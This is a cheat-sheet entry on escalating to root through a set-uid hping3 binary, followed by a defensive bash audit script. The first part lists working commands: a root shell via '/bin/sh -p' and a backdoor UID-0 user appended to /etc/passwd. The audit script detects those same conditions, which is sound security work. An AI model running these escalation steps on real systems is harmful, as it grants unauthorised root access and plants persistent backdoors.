Hping3
hping3 is a network testing tool used for crafting and sending custom TCP/IP packets. It supports TCP, UDP, ICMP, and RAW-IP protocols, allowing precise control over packet headers. Unlike standard tools like ping, hping3 enables advanced manipulation of traffic for in-depth network analysis and security assessment.
When the hping3 binary is installed with the SUID bit set, it can be leveraged to gain access to sensitive files or escalate to a root shell:
Escalate to root in a shell that is not fully interactive (source):
$ find / -type f -perm -u=s 2>/dev/null
/usr/sbin/hping3
$ /usr/sbin/hping3
hping3> /bin/sh -p
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
A new root user can be created to gain a fully interactive shell:
# Create a hash
$ openssl passwd -1 -salt hacker pass123
$1$hacker$zVnrpoW2JQO5YUrLmAs.o1
# Launch a hping3 shell
$ /usr/sbin/hping3
# Base-64 encode the payload
$ echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0::/root:/bin/bash' | base64
aGF...<SNIP>...oCg==
hping3> echo "aGF...<SNIP>...oCg==" | base64 -d >> /etc/passwd
hping3> su hacker
Password: pass123
# id
uid=0(root) gid=0(root) groups=0(root)
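Audit check for the two conditions used above (added example, not from the original page or the hping3 project): it tests whether the binary is set-uid and flags passwd entries that are UID 0 without being root or that carry a hash in the password field. The function names and the sample passwd content are constructed for illustration; the paths are the ones shown above.

```shell
#!/usr/bin/env bash
# Added example: function names are hypothetical, sample data is constructed.

# 1. Is the binary set-uid? Default path is the one shown on the page.
is_suid() {
    [ -u "${1:-/usr/sbin/hping3}" ]
}

# 2. Flag passwd entries that are UID 0 without being "root", or that carry
#    a crypt hash in field 2 (normally "x", with hashes kept in /etc/shadow).
audit_passwd() {
    awk -F: '
        /^#/ || NF < 7                  { next }
        $3 == 0 && $1 != "root"         { print "uid0:" $1 }
        substr($2, 1, 1) == "$"         { print "inline-hash:" $1 }
    ' "${1:-/etc/passwd}"
}

# Constructed sample: two normal entries plus the line appended on the page.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0::/root:/bin/bash
EOF
}

# Demo on the constructed sample, then a check of the local binary.
tmp=$(mktemp)
sample_passwd > "$tmp"
audit_passwd "$tmp"
rm -f "$tmp"
if is_suid; then
    echo "suid: /usr/sbin/hping3 (clear the bit with: chmod u-s /usr/sbin/hping3)"
fi
```

Run audit_passwd with no argument to check the live /etc/passwd; any output line is worth investigating.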